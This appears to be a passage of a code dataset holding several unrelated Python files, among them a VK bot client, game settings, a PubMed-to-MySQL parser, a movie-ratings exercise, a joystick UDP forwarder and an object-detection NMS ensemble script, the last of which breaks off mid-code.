self.extra_events:\n obj = update['object']\n user = await get_pages(self.token, obj['user_id'])\n return self.dispatch(t, (user[0], obj['self']))\n elif t == 'group_join' and 'on_group_join' in self.extra_events:\n obj = update['object']\n user = await get_pages(self.token, obj['user_id'])\n return self.dispatch(t, (user[0], obj['join_type']))\n elif t == 'user_block' and 'on_user_block' in self.extra_events:\n obj = update['object']\n blocked = await get_blocked_user(self.token, obj)\n return self.dispatch(t, blocked)\n elif t == 'user_unblock' and 'on_user_unblock' in self.extra_events:\n obj = update['object']\n unblocked = await get_unblocked_user(self.token, obj)\n return self.dispatch(t, unblocked)\n elif t == 'poll_vote_new' and 'on_poll_vote_new' in self.extra_events:\n obj = update['object']\n vote = await get_poll_vote(self.token, obj)\n return self.dispatch(t, vote)\n elif t == 'group_officers_edit' and 'on_group_officers_edit' in self.extra_events:\n obj = update['object']\n edit = await get_officers_edit(self.token, obj)\n return self.dispatch(t, edit)\n elif 'on_unknown' in self.extra_events:\n return self.dispatch('unknown', update)\n\n async def handle_user_update(self, update):\n t = update.pop(0)\n if t == 4 and 'on_message_new' in self.extra_events:\n data = {\n 'id': update.pop(0),\n 'flags': UserMessageFlags(update.pop(0)),\n 'peer_id': update.pop(0),\n 'date': update.pop(0),\n 'text': update.pop(1),\n 'attachments': update.pop(1)\n }\n msg = await build_user_msg(data, self)\n return self.dispatch('message_new', msg)\n elif 'on_unknown' in self.extra_events:\n return self.dispatch('unknown', update)\n\n def dispatch(self, event, *args, **kwargs):\n method = 'on_' + event\n listeners = self._listeners.get(event)\n if listeners:\n removed = []\n for i, (future, condition) in enumerate(listeners):\n if future.cancelled():\n removed.append(i)\n continue\n\n try:\n result = condition(*args)\n except Exception as exc:\n future.set_exception(exc)\n removed.append(i)\n else:\n if result:\n if len(args) == 0:\n future.set_result(None)\n elif len(args) == 1:\n future.set_result(args[0])\n else:\n future.set_result(args)\n removed.append(i)\n\n if len(removed) == len(listeners):\n self._listeners.pop(event)\n else:\n for idx in reversed(removed):\n del listeners[idx]\n\n try:\n coro = getattr(self, method)\n except AttributeError:\n pass\n else:\n self._schedule_event(coro, method, *args, **kwargs)\n\n async def on_error(self, event_method, *args, **kwargs):\n print('Ignoring exception in {}'.format(event_method), file=sys.stderr)\n traceback.print_exc()\n\n async def _run_event(self, coro, event_name, *args, **kwargs):\n try:\n await coro(*args, **kwargs)\n except asyncio.CancelledError:\n pass\n except Exception:\n try:\n await self.on_error(event_name, *args, **kwargs)\n except asyncio.CancelledError:\n pass\n\n def _schedule_event(self, coro, event_name, *args, **kwargs):\n wrapped = self._run_event(coro, event_name, *args, **kwargs)\n return _ClientEventTask(original_coro=coro, event_name=event_name, coro=wrapped, loop=self.loop)\n\n async def get_user(self, uid):\n user = await get_users(self.token, uid)\n if user:\n return user[0]\n return None\n\n async def get_group(self, gid):\n group = await get_groups(self.token, gid)\n if group:\n return group[0]\n return None\n\n async def send_message(self, peer_id=None, message=None, *, attachment=None, sticker_id=None, keyboard=None, reply_to=None, forward_messages=None):\n params = {'group_id': self.group.id, 'random_id': randint(-2 ** 63, 2 ** 63 - 1), 'peer_id': peer_id, 'message': message, 'attachment': attachment,\n 'reply_to': reply_to, 'forward_messages': forward_messages, 'sticker_id': sticker_id, 'keyboard': keyboard}\n res = await vk_request('messages.send', self.token, **params)\n if 'error' in res.keys():\n raise VKApiError('[{error_code}] {error_msg}'.format(**res['error']))\n params['id'] = res['response']\n params['from_id'] = -self.group.id\n return await build_msg(params, self)\n\n async def _run(self, owner_id):\n if owner_id and owner_id.__class__ is not int:\n raise TypeError(f'Owner_id must be positive integer, not {owner_id.__class__.__name__}')\n if owner_id and owner_id < 0:\n raise VKApiError(f'Owner_id must be positive integer')\n user = await get_own_page(self.token)\n if user.__class__ is User:\n self.is_group = False\n self.group = Group({})\n self.user = user\n ts = await self.get_user_longpoll()\n self.dispatch('ready')\n updates = []\n while True:\n try:\n lp = self.loop.create_task(self.longpoll(ts))\n for update in updates:\n self.loop.create_task(self.handle_user_update(update))\n ts, updates = await lp\n except Exception as e:\n print(f'Ignoring exception in longpoll cycle:\\n{e}', file=sys.stderr)\n ts = await self.get_longpoll_server()\n else:\n self.is_group = True\n self.group = user\n self.user = User({})\n if self.is_group and owner_id:\n raise VKApiError('Owner_id passed together with group access_token')\n ts = await self.get_longpoll_server()\n self.dispatch('ready')\n updates = []\n while True:\n try:\n lp = self.loop.create_task(self.longpoll(ts))\n for update in updates:\n self.loop.create_task(self.handle_update(update))\n ts, updates = await lp\n except Exception as e:\n print(f'Ignoring exception in longpoll cycle:\\n{e}', file=sys.stderr)\n ts = await self.get_longpoll_server()\n\n def run(self, token, owner_id=None):\n self.token = token\n self.loop.create_task(self._run(owner_id))\n self.loop.run_forever()\n","sub_path":"vk_botting/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":20723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"104545996","text":"class Setting:\n \"\"\"游戏属性默认设置\"\"\"\n def __init__(self):\n self.screen_width = 1200\n self.screen_height = 800\n self.bg_color = (230, 230, 230)\n self.bg_blue = (187, 255, 255)\n self.ship_speed = 1.5\n self.ship_limit = 3\n\n # 子弹属性\n self.bullet_speed = 1.0\n self.bullet_width = 3\n self.bullet_height = 15\n self.bullet_color = (60, 60, 60)\n self.bullet_max_num = 10\n\n # 外星人\n self.alien_speed = 1.0\n self.fleet_drop_speed = 10\n self.alien_direction = 1\n\n self.rain_width = 60\n self.rain_height = 57\n\n self.alien_score = 10\n\n # 增加游戏难度\n self.speedup = 1.1\n self.score_up = 1.5\n\n def init_setting(self):\n self.ship_speed = 1.5\n self.alien_speed = 1.0\n self.fleet_drop_speed = 10\n self.alien_direction = 1\n self.alien_score = 10\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"198420166","text":"import os\r\nimport os.path\r\n\r\ndef is_float(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False\r\n\r\ndef get_resolution(title):\r\n delimiters = ['[',']','(',')']\r\n width, height = '', ''\r\n res = []\r\n for char in delimiters:\r\n if char in title:\r\n title = title.replace(char, '')\r\n title = list(title)\r\n for i in range(len(title)):\r\n if (is_float(title[i]) and i >= len(title)*0.6):\r\n res.append(title[i])\r\n for element in res[:int(len(res) / 2)]:\r\n width += element\r\n for element in res[int(len(res) / 2):]:\r\n height += element\r\n if (len(width) == 0 or len(height) == 0):\r\n width, height = 0, 0\r\n return int(width), int(height)\r\n\r\ndef compatable(post):\r\n width,height = get_resolution(post.title)\r\n return (width >= 1920 and height >= 1080) and (width > height)\r\n\r\ndef cleanup_title(text):\r\n chars = ['/','\\\\',':','*','?','<','>','\"','|']\r\n for char in chars:\r\n if char in text:\r\n text = text.replace(char, '')\r\n return text\r\n \r\ndef cleanup_url(url):\r\n retStr = url\r\n url = url.split('.')\r\n if (url[len(url) - 1] != 'jpg'):\r\n retStr += '.jpg'\r\n return retStr\r\n\r\ndef size_filter(main_path):\r\n dels = 0\r\n for sub_path in os.listdir(main_path):\r\n file = os.path.join(main_path, sub_path)\r\n if (os.path.getsize(file) / 1000 < 300):\r\n os.remove(file)\r\n dels += 1\r\n return dels\r\n \r\n","sub_path":"Packages/old/auxv2.py","file_name":"auxv2.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"205897014","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 24 14:34:14 2020\r\n\r\n@author: djx\r\n\"\"\"\r\n\r\n#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n\r\n\r\n#导入mysql库存储数据\r\nimport pymysql \r\n#引入re,将作者名称中的单引号转义 pymysql.escape_string()有同样效果\r\n#from re import escape\r\n#连接pneumonia数据库\r\ndb=pymysql.connect(host='localhost',user='djx_pneumonia', password='123456',db = 'pneumonia')\r\n# cursor.close() 用完指针对象是否要关闭 要\r\n\r\n\r\n\r\nimport time\r\nimport os\r\nimport sys\r\n\r\nclass Logger(object):\r\n\r\n def __init__(self, stream=sys.stdout):\r\n project_path = r\"D:\\personfile\\study\\大三\\论文软著\\王菲菲老师\\疫情中各国学者在科技攻关和科技合作方面的贡献情况\\project\"\r\n demo_path = project_path + \"\\\\notebook的导出代码\"\r\n output_dir = demo_path + \"\\\\log\"\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n log_name = '{}.log'.format(time.strftime('%Y-%m-%d-%H-%M'))\r\n filename = os.path.join(output_dir, log_name)\r\n\r\n self.terminal = stream\r\n self.log = open(filename, 'a+',encoding='utf-8')\r\n\r\n def write(self, message):\r\n self.terminal.write(message)\r\n self.log.write(message)\r\n\r\n def flush(self):\r\n pass\r\n\r\n\r\n\r\n# 编号:001\r\n# 功能:查询指定作者的个人信息\r\n# 参数:作者的全名\r\n# 返回值:查找成功则返回作者全部个人信息,失败返回None,输出报错信息\r\ndef select_writer(FAU):\r\n sql = \"select * from writer where FAU = '%s'\" % pymysql.escape_string(FAU)\r\n try:\r\n db.ping(reconnect=True) # 在每次执行sql语句前先执行 conn.ping(reconnect=True),可以保证conn丢失时自动重连,避免出现(0,'')报错\r\n cursor=db.cursor()\r\n \r\n if cursor.execute(sql)>0:\r\n # 获取所有记录列表\r\n writer = cursor.fetchone()\r\n cursor.close()\r\n return writer\r\n else:\r\n cursor.close()\r\n \r\n \r\n except Exception as e:\r\n print (\"Error: unable to fetch writer's data \" + str(e))\r\n print(sql)\r\n cursor.close()\r\n return None\r\n \r\n\r\n# 编号:002\r\n# 功能:插入一个作者的个人信息\r\n# 参数:作者全名、简名、机构、国籍\r\n# 返回值:插入成功则返回作者AUID,失败无返回值,输出报错信息\r\ndef insert_writer(AUID,FAU,AU,AD,Country):\r\n \r\n writer = select_writer(FAU) # 检查表中是否已经有该作者,若已有则返回其整行记录\r\n# print(dir(writer))\r\n if(writer is not None):\r\n return writer[0]\r\n AD = AD.replace(\"\\n\",\"\") # 需要放到转义语句之前,因为换行符被转义了?对就是这样\r\n AD = pymysql.escape_string(AD) # 避免数据库注入时的单引号 or 双引号未转义导致失败\r\n AU = pymysql.escape_string(AU)\r\n FAU = pymysql.escape_string(FAU)\r\n Country = pymysql.escape_string(Country)\r\n sql = \"insert into writer(AUID,FAU,AU,AD,Country) values('%s','%s','%s','%s','%s')\" % (AUID,FAU,AU,AD,Country)\r\n try:\r\n db.ping(reconnect=True)\r\n cursor=db.cursor()\r\n cursor.execute(sql)\r\n db.commit()\r\n cursor.close()\r\n return AUID\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: unable to insert writer's data \" + FAU + \" \" + AU + \" \" + AD + \" \" + Country + str(e))\r\n\r\n\r\n\r\n# 编号:003.1\r\n# 功能:查询article\r\n# 返回值:PMID\r\ndef select_article(PMID):\r\n \r\n sql = \"select * from article where PMID = '%s'\" % PMID\r\n try:\r\n db.ping(reconnect = True)\r\n cursor = db.cursor()\r\n a = cursor.execute(sql) \r\n if a > 0:\r\n article = cursor.fetchone()\r\n print(article)\r\n cursor.close()\r\n return article\r\n else:\r\n cursor.close()\r\n return None\r\n except Exception as e:\r\n print(str(e) + \"函数003.1-查询article 出现错误\")\r\n return None\r\n\r\n# 编号:003\r\n# 功能:向article表插入文献信息\r\n# 参数:PMID,DEP,LA,TA\r\n# 返回值:PMID,失败则弹出提示信息\r\ndef insert_article(PMID,DEP,LA,TA,topic):\r\n PMID = PMID.strip()\r\n DEP = pymysql.escape_string(DEP)\r\n LA = pymysql.escape_string(LA)\r\n TA = pymysql.escape_string(TA)\r\n\r\n# 有的文章可能同时在两个话题下\r\n# has_save有值的时候,该文章已经插入了\r\n has_save = select_article(PMID)\r\n sql_1 = \"insert into article(PMID,DEP,LA,TA)values('%s','%s','%s','%s')\" % (PMID,DEP,LA,TA)\r\n sql_2 = \"insert into topic(PMID,topic)values('%s','%s')\"%(PMID,topic)\r\n try:\r\n db.ping(reconnect=True)\r\n cursor = db.cursor()\r\n print(PMID,DEP,LA,TA,topic)\r\n if has_save is None:\r\n print(\"文章还未插入\")\r\n cursor.execute(sql_1)\r\n cursor.execute(sql_2)\r\n db.commit()\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: unable to insert article's infomation,可能已经插入了\" + str(PMID) +\"because\" + str(e))\r\n\r\n\r\n\r\n\r\n# 编号:004\r\n# 功能:查询作者与文献编号的关系是否已经录入\r\n# 参数:AUID,PMID\r\n# 返回值:如果已经插入就返回RecordID,未插入就返回空\r\ndef select_Relationship(AUID,PMID):\r\n sql = \"select * from relationship where AUID = '%s' and PMID = '%s'\"%(AUID,PMID)\r\n try:\r\n db.ping(reconnect = True)\r\n cursor = db.cursor()\r\n cursor.execute(sql)\r\n db.commit()\r\n result = cursor.fetchone()\r\n cursor.close()\r\n return result\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: 查询relationship失败\" + \"AUID:\" + AUID + \"PMID:\" + PMID + str(e))\r\n\r\n\r\n# 编号:005\r\n# 功能:将作者AUID与文献编号PMID结合,存入RelationShip 表\r\n# 参数:AUID,PMID\r\n# 返回值:如果已经插入过,返回该记录信息。\r\n# 若未插入,插入成功返回RecordID,如果插入失败会提示报错信息\r\ndef insert_article_and_author(AUID,PMID):\r\n sql = \"insert into relationship(AUID,PMID)values('%s','%s')\" % (AUID,PMID)\r\n try:\r\n result = select_Relationship(AUID,PMID)\r\n if result:\r\n print('已存在该记录'+ str(result))\r\n return result\r\n db.ping(reconnect=True)\r\n cursor=db.cursor()\r\n cursor.execute(sql)\r\n db.commit()\r\n cursor.close()\r\n return True\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: unable to insert relationship\" + \"AUID:\" + str(AUID) + \"PMID:\" + str(PMID) + str(e),end='-------------\\n\\n')\r\n\r\n\r\ndef main():\r\n sys.stdout = Logger(sys.stdout) # 将输出记录到log\r\n project_path = r\"D:\\personfile\\study\\大三\\论文软著\\王菲菲老师\\疫情中各国学者在科技攻关和科技合作方面的贡献情况\\project\"\r\n result_folder_path = project_path + r\"\\result\\7.11\"\r\n# result_filepath = result_folder_path + r\"\\Forecasting.txt\"\r\n AUID = 1000\r\n for filename in os.listdir(result_folder_path):\r\n result_filepath = result_folder_path + \"\\\\\" + filename\r\n print(result_filepath)\r\n with open(result_filepath,'r',encoding = 'utf-8') as result_file:\r\n topic = filename[:-4]\r\n DEP = ''\r\n LA = ''\r\n TA = ''\r\n ADline = []\r\n PMID = ''\r\n for i in result_file.readlines():\r\n # 观察发现前面不管标识字段有几位,破折号前算上空格总是四位\r\n if(i[:4] == 'PMID'): # PMID字段提取\r\n flag = 'PMID'\r\n insert_article(PMID,DEP,LA,TA,topic)\r\n PMID = i[6:] \r\n continue\r\n if(i[:4] == 'DEP '): #DEP发表时间字段提取\r\n DEP = i[6:].strip()\r\n continue\r\n if(i[:4] == 'LA '): #LA语言字段提取\r\n flag = 'LA'\r\n LA = i[6:].strip()\r\n continue\r\n if(i[:4] == 'TA '): #TA 期刊名字字段提取\r\n TA = i[6:].strip()\r\n continue\r\n if(i[:4] == 'FAU '): # FAU作者全名字段提取\r\n flag = 'FAU'\r\n if('FAU' in locals().keys()):\r\n # 如果这个键还没有,也就是第一个作者还没有开始录入,就不插入\r\n # 如果这个键已经有了,就说明之前已经有FAU,AU,AD信息了,就录入并更新下一个\r\n if('AD' not in locals().keys()):\r\n AD = ''\r\n temp = AUID\r\n AUID = insert_writer(AUID,FAU,AU,AD,'Country')\r\n ADline = [] \r\n # 插入一个作者前需清空上一个作者的全部属性,重新填充\r\n insert_article_and_author(AUID,PMID)\r\n if AUID == temp:\r\n AUID = temp + 1\r\n else:\r\n AUID = temp\r\n FAU = i[6:].strip(\"\\n '\" ) # 对存入数据库的模块要去除换行符、空白格、转义单引号\r\n continue\r\n if(i[:4] == 'AU '): #AU作者缩写名字字段提取\r\n AU = i[6:].strip(\"\\n '\")\r\n continue\r\n if(i[:4] == 'AD 'or (i[:1]==' 'and flag == 'AD')): # AD作者所属机构字段提取\r\n flag = 'AD' \r\n ADline.append(i[6:])\r\n AD = \"\".join(ADline)\r\n continue\r\n db.close()\r\nmain()\r\n\r\n\r\n# #### 关于字符串注入数据库转义特殊字符的实例\r\n\r\n# print(\"University of Toronto, St. Michael\\\\\\'s Hospital, and BlueDot, Toronto, Ontario, Canada (K.K.).\")\r\n# \r\n# output:University of Toronto, St. Michael\\'s Hospital, and BlueDot, Toronto, Ontario, Canada (K.K.).\r\n\r\n\r\n\r\n","sub_path":"step1:提取_存储.py","file_name":"step1:提取_存储.py","file_ext":"py","file_size_in_byte":10134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"289335628","text":"#%%\nmovie_object_list = [{'Title': 'Back to the Future',\n 'Year': '1985',\n 'Rated': 'PG',\n 'Released': '03 Jul 1985',\n 'Runtime': '116 min',\n 'Genre': 'Adventure, Comedy, Sci-Fi',\n 'Ratings': [{'Source': 'Internet Movie Database', 'Value': '8.5'},\n {'Source': 'Rotten Tomatoes', 'Value': '96'},\n {'Source': 'Metacritic', 'Value': '87'}],\n 'Production': 'Universal Pictures'},\n {'Title': 'Spirited Away',\n 'Year': '2001',\n 'Rated': 'PG',\n 'Released': '28 Mar 2003',\n 'Runtime': '125 min',\n 'Genre': 'Animation, Adventure, Family, Fantasy, Mystery',\n 'Ratings': [{'Source': 'Internet Movie Database', 'Value': '8.6'},\n {'Source': 'Rotten Tomatoes', 'Value': '77'},\n {'Source': 'Metacritic', 'Value': '96'}],\n 'Production': 'Walt Disney Pictures'},\n {'Title': 'Blade',\n 'Year': '1998',\n 'Rated': 'R',\n 'Released': '21 Aug 1998',\n 'Runtime': '120 min',\n 'Genre': 'Action, Horror, Sci-Fi',\n 'Ratings': [{'Source': 'Internet Movie Database', 'Value': '7.1'},\n {'Source': 'Rotten Tomatoes', 'Value': '54'},\n {'Source': 'Metacritic', 'Value': '45'}],\n 'Production': 'New Line Cinema'}]\n\n\nclass Movie:\n\n \"\"\"\n The Movie class holds all the data for a single movie, has getter methods to get title and movie rating\n \"\"\"\n\n def __init__(self, movie_data):\n \"\"\"\n Store the raw movie data\n\n Parameters: \n * movie_data: dict, full dictionary of movie data\n \"\"\"\n self.movie_data = movie_data\n\n def get_movie_title(self):\n \"\"\"\n Return movie title from the raw data.\n \"\"\"\n return self.movie_data['Title']\n\n def get_movie_rating(self, source = 'Rotten Tomatoes'):\n \"\"\"\n Return movie rating given source, \n \n Paramters:\n source: str, source of desired movie rating. Defaults to Rotten Tomatoes\n \"\"\"\n for rating in self.movie_data['Ratings']:\n if rating['Source'] == source:\n return(rating['Value'])\n\n return(f\"- Wait - Rating for source {source} was not found!\")\n\n\ndef return_single_movie_object(movie_title):\n \"\"\"\n Search through list of movie object dictionaries and return the object \n if the Title of that object matches the movie title passed.\n\n Parameters:\n * movie_title: str, title of movie whose dict object is to be returned.\n \"\"\"\n for movie_object in movie_object_list:\n if movie_object['Title'] == movie_title:\n return movie_object\n\n\ndef print_single_movie_rating(movie_query):\n \"\"\"\n Print a movie rating for a given movie.\n\n Parameters:\n * movie_query: str, title of movie to get rating for.\n \"\"\"\n this_movie_data = return_single_movie_object(movie_query)\n this_movie_instance = Movie(this_movie_data)\n movie_title = this_movie_instance.get_movie_title()\n movie_rating = this_movie_instance.get_movie_rating()\n print(f\"The rating for {movie_title} is {movie_rating}.\")\n\n\ndef print_all_ratings(movie_list):\n \"\"\"\n Print a judgement of each movie in a movie list. If the score is over 80,\n print that it's a great movie; if the score is over 60, print that it's a\n good movie; if the score is under 60 print that it's a bad movie.\n \n Parameters:\n * movie_list: list, List of movie titles to print ratings for.\n \"\"\"\n for movie in movie_list:\n this_movie_data = return_single_movie_object(movie)\n this_movie_instance = Movie(this_movie_data)\n movie_title = this_movie_instance.get_movie_title()\n movie_rating = float(this_movie_instance.get_movie_rating())\n if movie_rating >= 80:\n print(movie_title, 'is a great movie!')\n elif movie_rating >= 60:\n print(movie_title, 'is a good movie')\n elif movie_rating < 60:\n print(movie_title, 'is a bad movie')\n\n\ndef main():\n \"\"\"\n Run from here\n \"\"\"\n print_all_ratings(['Blade', 'Spirited Away', 'Back to the Future'])\n print_single_movie_rating('Spirited Away')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ga-python/mywork/w4d2/Lab-4-Solution.py","file_name":"Lab-4-Solution.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"369857914","text":"#!/usr/bin/python3\nimport struct\nimport time\nfrom socket import socket, AF_INET, SOCK_DGRAM\n\nhost = ''\nport = 5000\naddress = \"192.168.3.2\"\nsock = socket(AF_INET, SOCK_DGRAM)\ndevice_path = \"/dev/input/js0\"\n\nevent_format = \"LhBB\";\nevent_size = struct.calcsize(event_format)\n\nwhile True:\n try:\n with open(device_path, \"rb\") as device:\n print(\"input connect...\")\n while True:\n event = device.read(event_size)\n if event:\n sock.sendto(event, (address, port))\n except:\n print(\"dead...\")\n import traceback\n traceback.print_exc()\n time.sleep(5)\nsock.close()\n\n\n","sub_path":"scripts/clientJoy.py","file_name":"clientJoy.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"347244261","text":"class second:\n color = 'red'\n form = 'circle'\n square = 'big'\n def changecolor(self, newcolor):\n self.color = newcolor\n def changeform(self, newform):\n self.form = newform\n def changesquare(self, newsquare):\n self.square = newsquare\n\nobj1 = second()\nobj2 = second()\n\nprint(obj1.color, obj1.form, obj1.square)\nprint(obj2.color, obj2.form, obj2.square)\n\nobj1.changecolor(input('Введите цвет обьекта 1 - '))\nobj1.changeform(input('Введите форму обьекта 1 - '))\nobj1.changesquare(input('Введите размер обьекта 1 - '))\nobj2.changecolor(input('Введите цвет обьекта 2 - '))\nobj2.changeform(input('Введите форму обьекта 2 - '))\nobj2.changesquare(input('Введите размер обьекта 2 - '))\n\nprint(obj1.color, obj1.form, obj1.square)\nprint(obj2.color, obj2.form, obj2.square)\n","sub_path":"class obj.py","file_name":"class obj.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"599690462","text":"from nms import py_cpu_nms,py_cpu_softnms,set_cpu_nms\nfrom d2det.ops.nms.nms_wrapper import soft_nms\nimport numpy as np\nfrom tqdm import tqdm \nfrom collections import defaultdict\nimport random\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom ensemble_boxes import nms\nimport json\nimport os\ntry:\n import xml.etree.cElementTree as ET #解析xml的c语言版的模块\nexcept ImportError:\n import xml.etree.ElementTree as ET\ndef fliter(rectange_list,fliterscore,AnotPath,segma_woh,segma_area,up_bound,down_bound,down_fs,yichang):\n if test:\n print(\"fliter start before \",len(rectange_list))\n if yichang:\n dis_woh=[i['bbox'][3]/(i['bbox'][2]+0.0000001) for i in rectange_list]\n dis_area=[i['bbox'][3]*i['bbox'][2] for i in rectange_list]\n u_woh=np.mean(dis_woh)\n std_woh=np.std(dis_woh)*segma_woh\n u_area=np.mean(dis_area)\n std_area=np.std(dis_area)*segma_area\n # print(\"fliter outlier before \",len(rectange_list))\n rectange_list=[i for i in rectange_list if (u_woh-std_wohup_bound)]\n rectange_list=[i for i in rectange_list if i['score'] >fliterscore]\n if test:\n print(\"fliter outlier after \",len(rectange_list))\n rectange_list=GetAnnotBoxLoc(AnotPath,rectange_list)\n if down_bound and down_fs:\n rectange_list=[i for i in rectange_list if (i['bbox'][1]>down_bound and i['score']>down_fs) or i['bbox'][1]1:\n new_score=float(1)\n i.update(category_id=1,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 1\" \n results1.append(i)\n elif i['category_id']==2 and i['image_id'] in selected2:\n new_score=i['score']*weight[0]\n if new_score>1:\n new_score=float(1)\n i.update(category_id=2,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 2\" \n results2.append(i)\n elif i['category_id']==3 and i['image_id'] in selected3:\n new_score=i['score']*weight[0]\n if new_score>1:\n new_score=float(1)\n i.update(category_id=3,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 3\" \n results3.append(i)\n elif i['category_id']==4 and i['image_id'] in selected4:\n new_score=i['score']*weight[0]\n if new_score>1:\n new_score=float(1)\n i.update(category_id=4,score=new_score)\n assert isinstance(i['category_id'],int),f\"the results must is 4\" \n results4.append(i)\n print(\"cid1\",len(results1),\"cid2\",len(results2),\"cid3\",len(results3),\"cid4\",len(results4))\n return results1,results2,results3,results4\n\ndef indexResults(reslist,annopath=\"\"):\n annopath=\"/root/data/gvision/dataset/raw_data/image_annos/person_bbox_test.json\"\n # print('Loading test annotation json file: {}'.format(annopath))\n with open(annopath, 'r') as load_f:\n anno= json.load(load_f)\n # print(\"bboxex_num\",len(reslist))#498\n indexedresults = defaultdict(list)\n # if test:\n # tempannos={}\n # imgfilters=imgfilters\n # if imgfilters:\n # # imgfilters=[\"15_24\"]\n # for imgfilter in imgfilters:\n # tempannos.update({i:j for i,j in anno.items() if imgfilter in i })\n # anno=tempannos\n def say(iss):\n filename, annodict=iss[0],iss[1]\n imageid = annodict['image id']\n for resdict in reslist:\n resimageid = resdict['image_id']\n if resimageid == imageid:\n indexedresults[imageid ].append(resdict)\n return indexedresults\n executor = ThreadPoolExecutor(max_workers=10)\n func_var = [[file_name,dict_value] for file_name,dict_value in anno.items()]\n pbar = tqdm(total=len(anno), ncols=50)\n for temp in executor.map(say,func_var):\n indexedresults.update(temp)\n pbar.update(1)\n pbar.close()\n results = indexedresults\n print(\"index bbox to self image\")\n return results \ndef GetAnnotBoxLoc(AnotPath,rectange_list):#AnotPath VOC标注文件路径\n tree = ET.ElementTree(file=AnotPath) #打开文件,解析成一棵树型结构\n root = tree.getroot()#获取树型结构的根\n ObjectSet=root.findall('object')#找到文件中所有含有object关键字的地方,这些地方含有标注目标\n backlist=[]\n # print(f\"forbid zone before {len(rectange_list)}\")\n \n for a in rectange_list:\n i=a[\"bbox\"]\n imageid=a[\"image_id\"]\n # print(imageid)\n left,up,right,down=i[0],i[1],i[0]+i[2],i[3]+i[1]\n templist=[]\n inter_xml=np.zeros(len(ObjectSet),dtype=float)\n for k,Object in enumerate(ObjectSet):\n BndBox=Object.find('bndbox')\n xmin= int(BndBox.find('xmin').text)#-1 #-1是因为程序是按0作为起始位置的\n ymin= int(BndBox.find('ymin').text)#-1\n xmax= int(BndBox.find('xmax').text)#-1\n ymax= int(BndBox.find('ymax').text)#-1\n templist.append({\n \"image_id\":imageid,\n \"category_id\":5,\n \"bbox\": [xmin,ymin,xmax-xmin,ymax-ymin],\n \"score\":0\n })\n\n if xmax <= left or right <= xmin or ymax <= up or down <= ymin:\n intersection = 0\n else:\n lens = min(xmax, right) - max(xmin, left)\n wide = min(ymax, down) - max(ymin, up)\n intersection = lens * wide\n # print(\"*\"*60,intersection)\n # print(i[2]*i[3])\n inter_xml[k]=intersection/(i[2]*i[3]+0.00001)\n if np.where(inter_xml<0.05)[0].shape[0]==len(ObjectSet):#则没有与bbox相交的xmlforbidzone < param or ==0\n backlist.append(a)\n # else:\n # print(np.where(inter_xml==0)[0].shape[0]==len(ObjectSet))\n # print(\"del\")\n # print(f\"forbid zone after {len(backlist)}\")\n return backlist#+templist#17_newzhongguan\n # return backlist,templist\n#\ndef wnms(results,outpath,outfile,iouthresh,savejson=1,nmsname=\"nms\"):\n indexedresults=indexResults(results)\n mergedresults = defaultdict(list)\n for (imageid, objlist) in indexedresults.items():\n for objdict in objlist:\n mergedresults[imageid].append([objdict['bbox'][0],objdict['bbox'][1],objdict['bbox'][2],objdict['bbox'][3],objdict['score'], objdict['category_id']])\n objlist=mergedresults[imageid]\n # masxlist=[i[2]*i[3] for i in objlist]\n # max_wh=np.max(masxlist)\n # objlist=[[i[0],i[1],i[2],i[3],i[4]*0.05+i[3]*i[2]*0.95/max_wh,i[5],i[6]] for i in objlist ]\n if nmsname==\"softnms\":\n newdets,keep=soft_nms(np.array(objlist),iou_thr=iouthresh, method='gaussian',sigma=0.5, min_score=1e-3)#'gaussian''linear',\n # keep =py_cpu_softnms(np.array(objlist),thresh=nms_thresh, Nt=0.02, sigma=0.5, method=1)\n outdets = []\n for index in keep:\n outdets.append(objlist[index])\n mergedresults[imageid] = outdets\n elif nmsname==\"nms\":\n keep = py_cpu_nms(np.array(objlist),iouthresh)\n outdets = []\n for index in keep:\n outdets.append(objlist[index])\n mergedresults[imageid] = outdets\n elif nmsname==\"setnms\":\n keep=np.array(objlist)[set_cpu_nms(np.array(objlist), nms_thresh)].tolist()\n mergedresults[imageid] = keep\n elif nmsname==False:\n print(\"no nms\")\n else:\n raise ValueError('nmsname must is softnms or nms')\n savelist = []\n def say2(iss):\n imageid, objlist=iss[0],iss[1]\n templist=[]\n\n for obj in objlist:#obj [22528, 1270, 24576, 1, 1.0, 4]\n templist.append({\n \"image_id\": imageid,\n \"category_id\": obj[5],\n \"bbox\": obj[:4],\n # \"bbox\": tlbr2tlwh(obj[:4]),\n \"score\": obj[4]\n })\n if isfliter:\n if 391<=imageid<=420:#14otc\n templist=fliter(templist,fliterscore[\"14_OCT\"],AnotPath=\"/root/data/gvision/dataset/xml/14_OCT_Habour.xml\",\n segma_woh=3,segma_area=3,up_bound=4000,down_bound=None,down_fs=0.95,yichang=0)\n if 421<=imageid<=450:#15 